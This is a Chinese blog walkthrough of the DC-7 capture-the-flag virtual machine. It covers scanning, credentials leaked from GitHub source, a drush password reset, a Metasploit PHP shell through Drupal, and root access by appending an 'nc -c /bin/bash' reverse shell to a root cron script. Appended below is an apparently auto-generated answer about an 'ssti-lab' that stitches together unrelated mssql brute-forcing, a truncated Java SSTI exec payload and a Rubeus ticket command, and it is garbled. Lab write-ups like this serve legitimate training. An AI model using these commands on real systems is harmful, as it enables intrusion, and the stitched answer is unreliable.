【DC7靶场通关详细记录】

搭建环境

  1. DC7靶场下载,点击下载https://www.five86.com/downloads/DC-7.zip
  2. 将下载好的DC7靶场导入到VMware中,导入时报错点击重试
  3. 设置kali和DC7的网络连接为统一连接方式

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -sC -p- -A 192.168.223.130

image.png

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

whatweb -v 192.168.223.130

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.130

image.png

查找漏洞

访问页面收集信息

  1. 收集页面信息,提供了登录、搜索功能

image.png

  1. 页面信息提示暴力破解不行,页面同时提示了网站创作者:DC7USERimage.png

通过信息泄露获取到账号密码

  1. 在github上搜索到项目源码,找到配置文件中账号密码

image.png

  1. 尝试登陆网页不成功

image.png

  1. 网站除去80端口,还有22端口,尝试登陆ssh

image.png

计划任务

  1. 在ssh登陆成功的用户dc7user中有一封邮件,提示是15分钟执行一次的计划任务,以及执行的任务内容和执行的脚本路径,执行脚本的权限是root

image.png

  1. 查看计划任务的执行脚本内容
    该脚本中执行了网站源码的备份,同时对数据库进行了备份,数据库备份时使用了drush命令。

image.png

  1. 执行一个drush的命令,尝试执行命令,在脚本中相同目录(/var/www/html)下,运行命令
    通过对drush的网络搜索,可以使用该命令更改用户的密码
drush user-password username --password="new_password"
//也可以创建新用户,未尝试,可以尝试一下
drush user-create username --password="user_password"

image.png

  1. 尝试登陆页面,密码更改成功,登陆成功

image.png

获取shell提升权限

尝试获取shell

  1. 网站页面有编辑器中没有php类型

image.png

  1. 下载php扩展,安装php扩展

image.png
image.png

  1. 在网站配置页面勾选php扩展

image.png

生成木马并上传获取shell

  1. 使用msf生成木马

image.png

  1. 复制木马内容到网站,保存为php类型

image.png

  1. 开启msf监听,在木马文件保存前开启

image.png

  1. 网站文件保存,msf获取到shell

image.png

提权

  1. 将反弹shell写入计划执行文件
    根据在漏洞查找过程发现的计划任务,其中的脚本是由root进行运行的,可以尝试计划任务提权
echo "nc -c /bin/bash ip  port" >> backups.sh

image.png

  1. 等待监听获取root权限,查看flag
nc -lvp 8889
pwd
whoami
cd /root
ls
cat theflag.txt

image.png

总结

  1. 代码托管平台源码信息泄露,会存在测试的账号密码
  2. Drush是一个用于Drupal内容管理系统的命令行工具,可以对数据库进行操作
  1. drush user-password username --password=“new_password” //更改密码
  2. drush user-create username --password=“user_password” //创建用户
  1. 计划任务提权的前提:有计划任务,计划任务root执行,当前用户对计划任务执行的文件可以写入🐒
  • 37
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值